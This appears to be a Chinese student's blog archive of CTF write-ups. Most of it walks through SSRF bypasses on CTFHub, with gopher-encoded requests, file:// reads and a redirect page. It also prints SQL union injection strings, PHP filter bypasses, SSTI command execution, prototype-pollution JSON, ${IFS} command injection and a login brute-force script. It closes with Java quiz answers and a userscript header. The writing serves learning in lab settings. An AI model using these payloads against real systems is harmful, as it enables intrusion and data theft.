file:/// 从文件系统中获取文件内容，如，file:///var/www/html/flag.php
file:// 主机名 / 路径：当有主机名时，这里的两个斜杠 // 用于分隔协议名和主机名，表明接下来是主机名信息。

例如:file://127.0.0.1/path/to/file.txt

file:/// 路径：当访问本地文件系统时，不存在主机名，此时的三个斜杠 /// 里，前面两个 // 是遵循 URI 格式规范中分隔协议名和主机名的部分，而第三个斜杠 / 则是路径的起始。例如 file:///var/www/html/flag.php，它表示访问本地系统中 /var/www/html/flag.php 这个文件。

gopher

gopher协议是一种信息查找系统，他将Internet上的文件组织成某种索引，方便用户从Internet的一处带到另一处。在WWW出现之前，Gopher是Internet上最主要的信息检索工具，Gopher站点也是最主要的站点，使用tcp70端口。但在WWW出现后，Gopher失去了昔日的辉煌。现在它基本过时，人们很少再使用它。
它只支持文本，不支持图像

1	gopher协议格式:gopher://IP:port/_{TCP/IP数据流}

几个方法

利用本地地址
- 原理：http://127.0.0.1和http://localhost是本地回环地址，用于访问本地服务器。直接使用这些地址可以让服务器发起对自身的请求，若服务器对目标地址验证不严格，就可能被利用来访问本地资源。
- 例子：当用户输入http://127.0.0.1/admin时，服务器未对该本地地址进行限制，就会去访问本地的admin页面
利用 [::]
- 原理：[::]在 IPv6 环境中表示本地地址，类似于 IPv4 中的127.0.0.1。服务器在处理 IPv6 地址时，如果存在漏洞，可能会将[::]解析为本地地址，从而绕过一些针对 IPv4 地址的限制。
- 例子：在一个支持 IPv6 的 Web 应用程序中，存在 SSRF 漏洞。输入http://[::]:80/admin.php，服务器在处理该请求时，将[::]解析为本地地址，并访问本地 80 端口的admin.php页面，获取敏感信息。
利用 @
- 原理：在一些 URL 处理机制中，@后面的部分可能被视为不同的域名或地址。通过在指定网址后加@ + 127.0.0.1，可能会使服务器将127.0.0.1作为目标地址进行请求，而忽略前面的部分，从而实现绕过。
- 例子：某网站功能是获取用户输入 URL 的网页内容。用户输入http://example.com@127.0.0.1/admin，服务器在处理时，将请求发送到127.0.0.1/admin，而不是example.com，攻击者借此绕过了对127.0.0.1的限制访问。
利用短域名
- 原理：短域名服务通常会将短域名重定向到原始的长域名。如果攻击者能够控制短域名的解析，将其指向127.0.0.1，那么当服务器访问短域名时，就会被重定向到本地地址，达到绕过限制的目的。
- 例子：注册了一个短域名http://dwz.cn/11SMa，并将其解析指向127.0.0.1。输入该短域名，服务器去访问http://dwz.cn/11SMa，随后被重定向到127.0.0.1，从而可能获取到本地服务器的敏感信息。
利用特殊域名
- 原理：xip.io等特殊域名服务会根据子域名的 IP 地址进行解析。例如，127.0.0.1.xip.io会被解析为127.0.0.1。服务器在处理这类域名时，会按照域名系统（DNS）的解析结果将请求发送到本地地址，从而绕过对直接使用本地地址的限制。
- 例子：攻击者输入http://127.0.0.1.xip.io/admin，服务器根据 DNS 解析将127.0.0.1.xip.io解析为127.0.0.1，并访问本地的admin页面，获取敏感数据。
利用 DNS 解析
- 原理：通过在域名上设置 A 记录，将其指向127.0.0.1，可以使服务器在访问该域名时，根据 DNS 解析结果将请求发送到本地地址。这是利用了服务器对域名解析的信任，只要域名能正确解析到本地地址，就可以绕过一些基于 IP 地址的访问限制。
- 例子：攻击者拥有一个域名evil.com，在 DNS 管理界面将该域名的 A 记录指向127.0.0.1。在存在 SSRF 漏洞的网站中，用户输入http://evil.com/admin，服务器根据 DNS 解析将请求发送到本地的127.0.0.1/admin，攻击者可能获取到本地服务器的敏感内容。
利用上传
- 原理：将文件上传字段的类型从file修改为url，使得服务器在处理上传时，将用户提交的 URL 作为数据进行处理。如果服务器对上传的 URL 没有进行严格的验证和过滤，就可能会发起对该 URL 的请求，从而导致 SSRF 漏洞被利用。
- 例子：原本上传表单的字段是，攻击者通过抓包修改该字段为，然后在输入框中填写http://127.0.0.1/admin，服务器会将其当作 URL 进行访问，可能获取到本地admin页面的敏感信息。
利用句号
- 原理：将正常的点号（.）替换为全角或其他特殊形式的句号，服务器在处理地址时，可能会将其错误地解析为正常的点号，从而将127。0。0。1识别为127.0.0.1，实现绕过。这是利用了服务器对地址格式验证的不严格性。
- 例子：在一个存在 SSRF 漏洞且对输入的 IP 地址有一定过滤规则（限制直接输入127.0.0.1）的系统中，输入127。0。0。1，由于服务器对特殊句号的处理不当，将其解析为127.0.0.1，并访问本地服务器，获取到了敏感信息。
进行进制转换
- 原理：将 IP 地址进行进制转换，如从十进制转换为十六进制或八进制，然后在请求中使用转换后的地址。服务器在处理这些地址时，如果对不同进制的地址解析存在漏洞，可能会将其解析为原始的 IP 地址，从而绕过基于十进制 IP 地址的过滤或限制。
- 例子：已知目标服务器存在 SSRF 漏洞且过滤了十进制的127.0.0.1。攻击者将127.0.0.1转换为十六进制0x7F.0x00.0x00.0x01，然后在漏洞输入处输入http://0x7F.0x00.0x00.0x01/admin，服务器在解析时将十六进制转换回十进制，并访问本地的admin页面，攻击者获取到了敏感数据。
利用特殊地址
- 原理：http://0/可能被服务器解析为本地地址或默认的回环地址。这是因为在一些网络配置或服务器处理机制中，0被视为特殊的本地地址标识，从而导致请求被发送到本地服务器，实现 SSRF 绕过。
- 例子：输入http://0/admin，服务器将0解析为本地回环地址127.0.0.1，并访问本地的admin页面，攻击者通过这种方式绕过了对127.0.0.1的限制，获取到了敏感信息。

题目

内网访问

url后加上地址，直接访问就行

flag:ctfhub{b808c03115dc747cca170205}

伪协议读取文件

访问file:///var/www/html/flag.php

-

查看源码

flag:ctfhub{0a68d1edbc7aaf74c3182b4b}

端口扫描

使用bp,在url=后加上127.0.0.1:，后面是狙击点

使用数值

有一个长度不一样的

flag:ctfhub{dc071b1db5358a23fe2964c0}

POST请求

用dirsearch扫描一下

发现有/flag.php

源码：

输点东西进去，提示只能从内网访问

伪协议file看一下

http://challenge-c31e7c56cac9116a.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

http://challenge-c31e7c56cac9116a.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php

好像意思是要把key在flag.php中传进去，而且要从127.0.0.1的内网传（好像是得），就能输出flag,没大看懂

使用gopher，一个post协议

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=facbefd1b5ad715b28f22f69767de786

flag:ctfhub{3772ca39025f9412dab29936}

上传文件

dirsearch扫描一下

发现有个flag.php

打开后是文件上传

加个提交按钮

~~上传一句话木马后显示只能从127.0.0.1上看~~

看了一下别人的wp发现和一句话木马没关系，为啥要叫webshell，以为要上传一句话呢

上传一个文本文件

用gopher协议

POST /flag.php HTTP/1.1
Host: challenge-1e43d5d6a835ce72.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryc2989fe8059f83f994d023bd4cf9bce8
Content-Length: 333
Origin: http://challenge-1e43d5d6a835ce72.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-1e43d5d6a835ce72.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache

------geckoformboundaryc2989fe8059f83f994d023bd4cf9bce8
Content-Disposition: form-data; name="file"; filename="ss.txt"
Content-Type: text/plain

111
------geckoformboundaryc2989fe8059f83f994d023bd4cf9bce8
Content-Disposition: form-data; name="submit"

提交查询
------geckoformboundaryc2989fe8059f83f994d023bd4cf9bce8--

url=gopher://127.0.0.1:80/_POST%2520%252Fflag%252Ephp%2520HTTP%252F1%252E1%250D%250AHost%253A%2520challenge%252D1e43d5d6a835ce72%252Esandbox%252Ectfhub%252Ecom%253A10800%250D%250AUser%252DAgent%253A%2520Mozilla%252F5%252E0%2520%2528Windows%2520NT%252010%252E0%253B%2520Win64%253B%2520x64%253B%2520rv%253A136%252E0%2529%2520Gecko%252F20100101%2520Firefox%252F136%252E0%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0%252E9%252C%252A%252F%252A%253Bq%253D0%252E8%250D%250AAccept%252DLanguage%253A%2520zh%252DCN%252Czh%253Bq%253D0%252E8%252Czh%252DTW%253Bq%253D0%252E7%252Czh%252DHK%253Bq%253D0%252E5%252Cen%252DUS%253Bq%253D0%252E3%252Cen%253Bq%253D0%252E2%250D%250AAccept%252DEncoding%253A%2520gzip%252C%2520deflate%252C%2520br%250D%250AContent%252DType%253A%2520multipart%252Fform%252Ddata%253B%2520boundary%253D%252D%252D%252D%252Dgeckoformboundaryc2989fe8059f83f994d023bd4cf9bce8%250D%250AContent%252DLength%253A%2520333%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge%252D1e43d5d6a835ce72%252Esandbox%252Ectfhub%252Ecom%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge%252D1e43d5d6a835ce72%252Esandbox%252Ectfhub%252Ecom%253A10800%252F%253Furl%253D127%252E0%252E0%252E1%252Fflag%252Ephp%250D%250AUpgrade%252DInsecure%252DRequests%253A%25201%250D%250APriority%253A%2520u%253D0%252C%2520i%250D%250APragma%253A%2520no%252Dcache%250D%250ACache%252DControl%253A%2520no%252Dcache%250D%250A%250D%250A%252D%252D%252D%252D%252D%252Dgeckoformboundaryc2989fe8059f83f994d023bd4cf9bce8%250D%250AContent%252DDisposition%253A%2520form%252Ddata%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522ss%252Etxt%2522%250D%250AContent%252DType%253A%2520text%252Fplain%250D%250A%250D%250A111%250D%250A%252D%252D%252D%252D%252D%252Dgeckoformboundaryc2989fe8059f83f994d023bd4cf9bce8%250D%250AContent%252DDisposition%253A%2520form%252Ddata%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%25E6%259F%25A5%25E8%25AF%25A2%250D%250A%252D%252D%252D%252D%252D%252Dgeckoformboundaryc2989fe8059f83f994d023bd4cf9bce8%252D%252D%250D%250A

flag:ctfhub{b2184ba24b1f73711bbc433a}

URL Bypass

必须以http://notfound.ctfhub.com开头，利用@

前几题都是在flag.php，不扫了

http://challenge-8969491d76b728e9.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

flag:ctfhub{cea33271e701772ca5d81eb8}

数字IP Bypass

127不能用了，先试试[::]，不管用

把127.0.0.1换成16进制0x7F.0x00.0x00.0x01

flag:ctfhub{83543fbfc136ce38c99b0eef}

302跳转 Bypass

虽然说了是302跳转但也可以不用302跳转，有两中方法

方法1

去自己的vps上的网站上新建个页面


if(isset($_GET['url'])){
    header("Location: {$_GET['http://127.0.0.1/flag.php']}");
    exit;
}
?>

http://challenge-f16e2f72d68913ad.sandbox.ctfhub.com:10800/?url=catblog.ggff.net/ctf/zd.php

方法2

file看一下源码

发现对localhost并没有过滤

访问http://challenge-f16e2f72d68913ad.sandbox.ctfhub.com:10800/?url=localhost/flag.php

flag:ctfhub{6fccc197195e2c5860463261}

SSRF（二）

DNS重绑定 Bypass

题目：

附件：浅谈DNS重绑定漏洞 - 知乎附件详细介绍了DNS重绑定的漏洞

先看一下flag.php,只能内网访问

file看一下




error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    exit;
}

echo getenv("CTFHUB");

再file看一下index.php，有个黑名单




error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$url = $_REQUEST['url'];

if (preg_match("/127|172|10|192/", $url)) {
    exit("hacker! Ban Intranet IP");
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

使用rbndr.us dns rebinding service来模拟 DNS 重绑

rbndr 利用特定的域名格式..rbndr.us来实现 IP 地址之间的切换，其服务器通过随机选择主机名中指定的一个地址并以非常低的 TTL（Time to Live，生存时间）作为回复来响应查询，从而模拟 DNS 重绑定攻击，帮助开发者识别和修复相关安全漏洞。

flag:ctfhub{f2555bbb8314bfb444f6fbc4}

FastCGI协议

fastcgi是一种通信协议，和http一样

HTTP协议是浏览器和服务器中间件进行数据交换的协议，浏览器将HTTP头和HTTP体用某个规则组装成数据包，以TCP的方式发送到服务器中间件，服务器中间件按照规则将数据包解码，并按要求拿到用户需要的数据，再以HTTP协议的规则打包返回给服务器。
类比HTTP协议来说，fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成，record也有header和body一说，服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端，语言后端解码以后拿到具体数据，进行指定操作，并将结果再按照该协议封装好后返回给服务器中间件。

record的头固定8字节

typedef struct {
  /* Header */
  unsigned char version; // 版本
  unsigned char type; // 本次record的类型
  unsigned char requestIdB1; // 本次record对应的请求id
  unsigned char requestIdB0;
  unsigned char contentLengthB1; // body体的大小
  unsigned char contentLengthB0;
  unsigned char paddingLength; // 额外块大小
  unsigned char reserved; 
 
  /* Body */
  unsigned char contentData[contentLength];
  unsigned char paddingData[paddingLength];
} FCGI_Record;

大体了解一下fastcgi。。。看了很多介绍没大看懂

Gopherus工具

工具: Gopherus

功能：生成针对 SSRF 漏洞的 Gopher 载荷，以实现远程代码执行（RCE）或获取目标服务器上的反向 Shell 等操作。

命令	描述
gopherus –help	帮助
gopherus –exploit	参数 :
	–exploit mysql
	–exploit postgresql
	–exploit fastcgi
	–exploit redis
	–exploit zabbix
	–exploit pymemcache
	–exploit rbmemcache
	–exploit phpmemcache
	–exploit dmpmemcache
	–exploit smtp

习题练习2

2025-06-11T12:28:00.000Z

本地管理员

源码中有个base64的注释

test123，试试账号admin密码test123

ip不能访问，添加X-Forwarded-For:127.0.0.1，获得flag

X-Forwarded-For 用于标识客户端（例如浏览器）的IP地址。在某些环境下，因为客户端通过了多个代理服务器来访问服务器，所以服务器不能直接获得客户端的真实IP地址，而只能获取到代理服务器的IP地址。
X-Forwarded-For: , ,
其中，是客户端的 IP 地址，和分别是经过的每个代理服务器的 IP 地址。最左边的 IP 地址是原始客户端的 IP 地址，最右边的 IP 地址是最近的代理服务器的 IP 地址

成绩查询

输入1有回显，1‘回显异常，1’#回显正常，判断是sql字符型注入

order by判断列数，当1' order by 5 # ' 时回显异常，字段数为4

爆库-1' union select 1,2,3,database()#

爆表-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf'#

暴字段

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'#

获得字段内容

-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

犯人留下了信息

两张图片

仔细看着两张图片

两张图片有不同之处，好像是盲水印

clonelink


```python2 decode.py --original 1.png --image 2.png --result 3.png```

![image-20250613225013160](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250613225013160.png)

## hate_php

![image-20250613231846132](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250613231846132.png)

![image-20250613231934572](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250613231934572.png)



过滤了字符：`f l a g . p h / ; " ' \` | [ ] _ =`

过滤了所有 PHP 内置函数名

为了绕过取两次反

将`~'highlight_file'`和`~'flag.php'`用url编码后再取反

```/?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8F%97%8F)```

![image-20250613232450540](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250613232450540.png)





## random

![image-20250614102123044](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102123044.png)

![image-20250614102143533](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102143533.png)

发送的数字通过get请求发送

![image-20250614102255852](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102255852.png)

题目叫守株待兔。将num随便取个值，然后对请求进行不断重放得到flag

![image-20250614102526564](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102526564.png)

## weakphp

![image-20250614102651768](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102651768.png)



![image-20250614102722645](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614102722645.png)

对网址进行扫描发现存在git目录

使用githack进行还原

![image-20250614103209398](/2025/06/11/2025-6-11-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A02/image-20250614103209398.png)

```php

require_once "flag.php";
if (!isset($_GET['user']) && !isset($_GET['pass'])) {
    header("Location: index.php?user=1&pass=2");
}

$user = $_GET['user'];
$pass = $_GET['pass'];
if ((md5($user) == md5($pass)) and ($user != $pass)){
    echo $flag;
} else {
    echo "nonono!";
}
?>

需要user和pass不相等但是md5值相等

用数组绕过，user[]=1&pass[]=2

fastjson 1.2.24-rce

用了dnslog

javac编译得到TouchFile.class

启动一个http服务

1	python -m http.server 2266

安装java1.8版本

下载编译 marshalsec然后一直报错

习题练习1

2025-06-04T12:28:00.000Z

闪的好快

打开后是一个不断变换的git动图，高度好像也缺了

对git图片进行分解

写个脚本，对二维码进行逐帧扫描，最后合并

import imageio
from PIL import Image
from pyzbar.pyzbar import decode

def extract_qr_data_from_gif(gif_path):
    gif = imageio.get_reader(gif_path)
    qr_data_list = []

    for frame in gif:
        pil_image = Image.fromarray(frame)

        decoded_objects = decode(pil_image)
        for obj in decoded_objects:
            qr_data_list.append(obj.data.decode('utf-8'))
    
    unique_qr_data = list(qr_data_list)
    combined_data = ''.join(unique_qr_data)
    
    return combined_data

gif_file_path = 'masterGO.gif'
combined_qr_data = extract_qr_data_from_gif(gif_file_path)
print(combined_qr_data)

come_game

一个游戏

玩一小会后发现多了几个文件

发现每通过一关后save1都会更改

第一关卡为31，第二关为32，不断进行更改，当为35时，游戏到达第5关，出现了flag

神秘的文件

压缩包里嵌压缩包，且第二个压缩包需要密码，明文攻击

得到密码q1w2e3r4

docx文件打不开，放入010发现开头是504b0304，后缀改为zip打开

在里面找到了flag.txt，ZmxhZ3tkMGNYXzFzX3ppUF9maWxlfQ==

base64解码得flag,flag{d0cX_1s_ziP_file}

全球最大交友网站

下载a.zip，git log查看历史版本

--hard 6b21737b59806722a89f33d26658b8508ac009e6```回滚


![image-20250607012249956](/2025/06/04/2025-6-4-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A01/image-20250607012249956.png)

![image-20250607012344500](/2025/06/04/2025-6-4-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A01/image-20250607012344500.png)

## nextGen 1

![image-20250607012615593](/2025/06/04/2025-6-4-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A01/image-20250607012615593.png)

![image-20250607012641867](/2025/06/04/2025-6-4-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A01/image-20250607012641867.png)

翻译：这只是我们想要开发的用于监控公司各部门的控制面板的第一个版本

试试直接访问```http://49.232.142.230:11835/flag.txt```

![image-20250607012755102](/2025/06/04/2025-6-4-%E4%B9%A0%E9%A2%98%E7%BB%83%E4%B9%A01/image-20250607012755102.png)

查看主页的源码，发现main.js

```js
function myFunc(eventObj) {
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function () {
      if (this.readyState == 4 && this.status == 200) {
        document.getElementById("content").innerHTML = xhttp.responseText;
      }
    };
    xhttp.open("POST", '/request');
    xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhttp.send("service=" + this.attributes.link.value);

  }

  var dep = document.getElementsByClassName('department');
  for (var i = 0; i < dep.length; i++) {
    dep[i].addEventListener('click', myFunc);
  }

事件监听：代码首先选择所有 class 为department的元素，并为每个元素添加了点击事件监听器myFunc。
异步请求：当点击任意.department元素时，myFunc函数会被调用，创建一个 XMLHttpRequest 对象并发送 POST 请求到/request路径。
数据处理：请求的参数是从被点击元素的link属性获取的，格式为service=属性值。
响应处理：当请求成功返回（状态码 200 且请求完成）时，将响应内容更新到 id 为content的 DOM 元素中。

看一下overview

请求的是外链,可能有ssrf，file://试试

测试

2025-06-04T03:33:00.000Z

一、单选题答案

C. JButton
D. getText()
D. MouseListener
B. JLabel
A. setLayout()
C. addActionListener()
B. JComboBox

二、多选题答案

C. JPanel、D. JFrame、E. JDialog
A. javax.swing、C. java.awt
A. JPanel、B. JButton、C. JPasswordField、E. JTextField
A. JTextField、B. JComboBox、C. JButton、E. JCheckBox
A. MouseListener、B. WindowListener、C. KeyListener、D. FocusListener、E. ActionListener
C. 事件适配器可以用于简化事件处理代码、D. 事件监听器必须实现相应的事件监听接口
A. 事件监听器必须实现事件处理方法、B. 事件适配器可以用于简化事件处理代码、C. 事件处理机制包括事件源、事件对象和事件监听器

三、判断题答案

A. 对
A. 对
B. 错
A. 对
A. 对
A. 对

答案总结表

题号	答案	题号	答案	题号	答案
1	C	8	CDE	15	A
2	D	9	AC	16	A
3	D	10	ABCE	17	B
4	B	11	ABCE	18	A
5	A	12	ABCDE	19	A
6	C	13	CD	20	A
7	B	14	ABC

LitCTF赛题复现

2025-05-27T12:28:00.000Z

web

nest_js

bp进行爆破，得到账号admin,密码password

星愿信箱

魔板注入

看有哪些函数

通过 config对象调用 os.popen执行 ls /

发现有flag,cat别屏蔽了，head /flag查看

多重宇宙日记

注册然后登陆

需要isAdmin状态

更新json

{
  "settings": {
    "__proto__": {
      "isAdmin": true
    }
  }
}

easy_file

放入bp分析

账号和密码先进行了base64编码，然后对=进行url编码

bp进行爆破

进去了

上传一句话，改请求

查看目录

输出fllag.php

disrsearch扫描网站，发先login界面

看一下源码，将js和一个请求投喂给ai，生成破解脚本

import requests
import hashlib
import time
import sys

def md5(text):
    """计算MD5哈希值"""
    return hashlib.md5(text.encode('utf-8')).hexdigest()

def generate_sign(username, password, timestamp, secret_key):
    """生成签名，模拟前端JavaScript的签名生成逻辑"""
    md5_username = md5(username)
    md5_password = md5(password)
    short_user = md5_username[:6]
    short_pass = md5_password[:6]
    sign_str = f"{short_user}{short_pass}{timestamp}{secret_key}"
    return md5(sign_str)

def crack_password(target_url, username, secret_key, dict_path):
    """执行密码爆破"""
    try:
        # 读取密码字典
        with open(dict_path, 'r', encoding='utf-8') as f:
            passwords = [line.strip() for line in f if line.strip()]
        print(f"字典加载成功，共 {len(passwords)} 个密码")
    except Exception as e:
        print(f"字典读取失败: {e}")
        return
    
    # 准备请求头
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*',
        'Origin': 'http://node6.anna.nssctf.cn:29799',
        'Referer': 'http://node6.anna.nssctf.cn:29799/login.html',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }
    
    # 计算用户名的MD5值
    md5_username = md5(username)
    
    # 开始爆破
    total = len(passwords)
    print(f"开始爆破，目标URL: {target_url}，用户: {username}")
    
    for i, password in enumerate(passwords, 1):
        try:
            # 生成当前时间戳（毫秒级）
            timestamp = str(int(time.time() * 1000))
            
            # 生成签名
            sign = generate_sign(username, password, timestamp, secret_key)
            
            # 准备请求数据
            data = {
                'username': md5_username,
                'password': md5(password),
                'timestamp': timestamp
            }
            
            # 添加签名到请求头
            headers['X-Sign'] = sign
            
            # 发送请求
            response = requests.post(target_url, headers=headers, data=data, timeout=10)
            
            # 显示进度
            sys.stdout.write(f"\r进度: {i}/{total} - 正在尝试: {password}")
            sys.stdout.flush()
            
            # 检查响应
            if response.status_code == 200:
                try:
                    json_data = response.json()
                    if json_data.get('code') == 200:  # 根据实际情况调整判断条件
                        print(f"\n\n爆破成功！用户名: {username}，密码: {password}")
                        print(f"MD5(用户名): {md5_username}")
                        print(f"MD5(密码): {md5(password)}")
                        print(f"时间戳: {timestamp}")
                        print(f"签名: {sign}")
                        print(f"响应内容: {response.text}")
                        return password
                except:
                    # 如果响应不是JSON格式，检查响应文本中是否包含成功标志
                    if "success" in response.text.lower() or "欢迎" in response.text:
                        print(f"\n\n爆破成功！用户名: {username}，密码: {password}")
                        print(f"MD5(用户名): {md5_username}")
                        print(f"MD5(密码): {md5(password)}")
                        print(f"时间戳: {timestamp}")
                        print(f"签名: {sign}")
                        print(f"响应内容: {response.text}")
                        return password
            
            # 防止请求过快
            time.sleep(0.1)
            
        except Exception as e:
            print(f"\n请求异常: {e}，继续尝试下一个密码...")
            continue
    
    print("\n\n所有密码尝试完毕，未找到正确密码")
    return None

if __name__ == "__main__":
    # 配置参数 - 根据实际情况修改
    TARGET_URL = 'http://node6.anna.nssctf.cn:29799/login.php'
    USERNAME = 'admin'  # 根据实际情况修改
    SECRET_KEY = 'easy_signin'  # 根据实际情况修改
    
    # 获取字典文件路径
    if len(sys.argv) < 2:
        print("用法: python password_cracker.py <字典文件路径>")
        sys.exit(1)
    
    DICT_PATH = sys.argv[1]
    
    # 执行爆破
    crack_password(TARGET_URL, USERNAME, SECRET_KEY, DICT_PATH)

在登录界面中的源码中有个api.js

请求/var/www/html/backup/8e0132966053d4bf8b2dbe4ede25502b.php试试

加上http://127.0.0.1/

只允许来自 127.0.0.1 的请求，执行用户传入的命令并返回结果，通过 name 参数控制后续命令执行

对空格进行了过滤，${IFS}进行绕过

发现327a6c4304ad5938eaf0efb6cc3e53dc.php比较特别，访问一下

Mis

Cropping

压缩包放入010，发现一偶一奇是伪加密，将50 4B 01 02后面的09 00改为08 00

成功打开压缩包，里面有许多二维码碎片

按照图片名称进行拼接

import os
from PIL import Image

def stitch_images():
    # 获取当前脚本所在目录
    script_dir = os.path.dirname(os.path.abspath(__file__))
    tiles_dir = os.path.join(script_dir, 'tiles')
    
    # 检查tiles目录是否存在
    if not os.path.exists(tiles_dir):
        print(f"错误：找不到tiles目录，请确保'{tiles_dir}'存在。")
        return
    
    # 初始化图片网格和最大坐标
    grid = {}
    max_x = 0
    max_y = 0
    
    # 遍历tiles目录中的所有文件
    for filename in os.listdir(tiles_dir):
        if filename.endswith('.png') and filename.startswith('tile_'):
            # 解析文件名中的坐标
            parts = filename.split('_')
            if len(parts) != 3:
                continue
                
            try:
                x = int(parts[1])
                y = int(parts[2].split('.')[0])
            except ValueError:
                continue
                
            # 更新最大坐标
            if x > max_x:
                max_x = x
            if y > max_y:
                max_y = y
                
            # 存储图片路径
            grid[(x, y)] = os.path.join(tiles_dir, filename)
    
    # 检查是否找到图片
    if not grid:
        print("错误：在tiles目录中未找到符合格式的图片。")
        return
    
    # 确定图片尺寸
    try:
        sample_img = Image.open(next(iter(grid.values())))
        tile_width, tile_height = sample_img.size
        sample_img.close()
    except Exception as e:
        print(f"错误：无法打开样本图片。{e}")
        return
    
    # 创建拼接后的图片
    result_width = (max_y + 1) * tile_width
    result_height = (max_x + 1) * tile_height
    result = Image.new('RGB', (result_width, result_height))
    
    # 拼接图片
    for (x, y), path in grid.items():
        try:
            img = Image.open(path)
            # 计算在结果图片中的位置
            pos_x = x * tile_height
            pos_y = y * tile_width
            # 粘贴图片
            result.paste(img, (pos_y, pos_x))
            img.close()
        except Exception as e:
            print(f"警告：无法处理图片 {path}。{e}")
    
    # 保存结果
    output_path = os.path.join(script_dir, 'stitched_image.png')
    result.save(output_path)
    print(f"拼接完成！结果已保存至 {output_path}")

if __name__ == "__main__":
    stitch_images()

得到完整二维码，扫码得flag

灵感菇🍄哩菇哩菇哩哇擦灵感菇灵感菇🍄

USB流量一把梭

进行镜像翻转得压缩包密码868F-83BD-FF

隐写

timehooker

2025-05-26T07:47:00.000Z

这是一个测试文本，你复制试试

https://gfork.zh-tw.eu.org/zh-hans/scripts/372673

// ==UserScript==
// @name            计时器掌控者|视频广告跳过|视频广告加速器
// @name:en         TimerHooker
// @namespace       https://gitee.com/HGJing/everthing-hook/
// @version         1.0.62
// @description     控制网页计时器速度|加速跳过页面计时广告|视频快进（慢放）|跳过广告|支持几乎所有网页.
// @description:en  it can hook the timer speed to change.
// @include         *
// @require         https://greasyfork.org/scripts/372672-everything-hook/code/Everything-Hook.js?version=881251
// @author          Cangshi
// @match           http://*/*
// @run-at          document-start
// @grant           none
// @license         GPL-3.0-or-later
// @downloadURL https://update.greasyfork.org/scripts/372673/%E8%AE%A1%E6%97%B6%E5%99%A8%E6%8E%8C%E6%8E%A7%E8%80%85%7C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E8%B7%B3%E8%BF%87%7C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E5%8A%A0%E9%80%9F%E5%99%A8.user.js
// @updateURL https://update.greasyfork.org/scripts/372673/%E8%AE%A1%E6%97%B6%E5%99%A8%E6%8E%8C%E6%8E%A7%E8%80%85%7C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E8%B7%B3%E8%BF%87%7C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E5%8A%A0%E9%80%9F%E5%99%A8.meta.js
// ==/UserScript==
/**
 * ---------------------------
 * Time: 2017/11/20 19:28.
 * Author: Cangshi
 * View: http://palerock.cn
 * ---------------------------
 */

